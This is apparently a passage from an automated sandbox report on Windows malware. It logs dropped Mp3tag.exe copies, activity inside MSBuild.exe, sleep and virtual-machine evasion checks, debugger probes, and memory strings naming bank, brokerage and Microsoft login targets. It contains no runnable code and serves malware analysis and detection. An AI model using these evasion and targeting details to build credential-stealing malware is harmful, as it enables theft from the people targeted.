                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3563Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5876Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lcqqpedjyaavJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\umfcpwvoouwjqJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7344Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7344Thread sleep time: -120000s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -53254s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7344Thread sleep time: -59881s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -39378s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7344Thread sleep time: -59765s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -51660s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -39702s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7344Thread sleep time: -59641s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7344Thread sleep time: -59520s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -58749s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7344Thread sleep time: -59370s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7344Thread sleep time: -59259s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -37773s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7344Thread sleep time: -59151s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -38006s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -41894s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7344Thread sleep time: -58515s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -47582s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -56132s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -44044s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -40870s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -53854s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -35986s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -36895s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -30332s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7624Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3232Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -39383s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -47061s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -32543s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -45041s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -50241s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -32824s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -31882s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -52625s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -47603s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7616Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -44848s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -36985s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -59638s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -41329s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -47145s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -53869s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1424Thread sleep time: -46830s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1252Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390C3984 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,5_2_00007FF7390C3984
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390D62F0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,swprintf,SetDlgItemTextW,FindClose,swprintf,SetDlgItemTextW,SendDlgItemMessageW,swprintf,SetDlgItemTextW,swprintf,SetDlgItemTextW,5_2_00007FF7390D62F0
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390E6DC0 FindFirstFileExA,5_2_00007FF7390E6DC0
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeCode function: 7_2_0081C510 FindFirstFileW,FindClose,7_2_0081C510
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeCode function: 7_2_00812940 FindFirstFileW,FindFirstFileW,7_2_00812940
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeCode function: 7_2_0081BD50 FindFirstFileW,FindClose,lstrlenW,7_2_0081BD50
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 9_2_004DC510 FindFirstFileW,FindClose,9_2_004DC510
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 9_2_004DBD50 FindFirstFileW,FindClose,lstrlenW,9_2_004DBD50
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 9_2_004D2940 FindFirstFileW,FindFirstFileW,9_2_004D2940
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390D90D8 VirtualQuery,GetSystemInfo,5_2_00007FF7390D90D8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53254Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59881Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39378Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59765Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 51660Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39702Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59641Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59520Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58749Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59370Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59259Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37773Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59151Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38006Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 41894Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58515Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47582Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56132Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 44044Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40870Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53854Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35986Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36895Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30332Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30000Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39383Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47061Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32543Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 45041Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50241Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32824Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 31882Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 52625Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47603Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 44848Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36985Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59638Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 41329Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47145Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53869Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 46830Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                            Source: cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                            Source: cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002702000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231LR
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                            Source: cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                            Source: cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                            Source: cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                            Source: cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                            Source: MSBuild.exe, 0000000E.00000002.2522571454.00000000006A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.00000000029D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                            Source: MSBuild.exe, 0000000E.00000002.2528981980.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                            Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_5-20100
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeAPI call chain: ExitProcess graph end nodegraph_7-5946
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeAPI call chain: ExitProcess graph end nodegraph_9-5688
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390DA3B8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF7390DA3B8
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C59ABE mov eax, dword ptr fs:[00000030h]15_2_02C59ABE
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C69301 mov eax, dword ptr fs:[00000030h]15_2_02C69301
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C599C4 mov eax, dword ptr fs:[00000030h]15_2_02C599C4
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390E7E40 GetProcessHeap,5_2_00007FF7390E7E40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390D99D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF7390D99D8
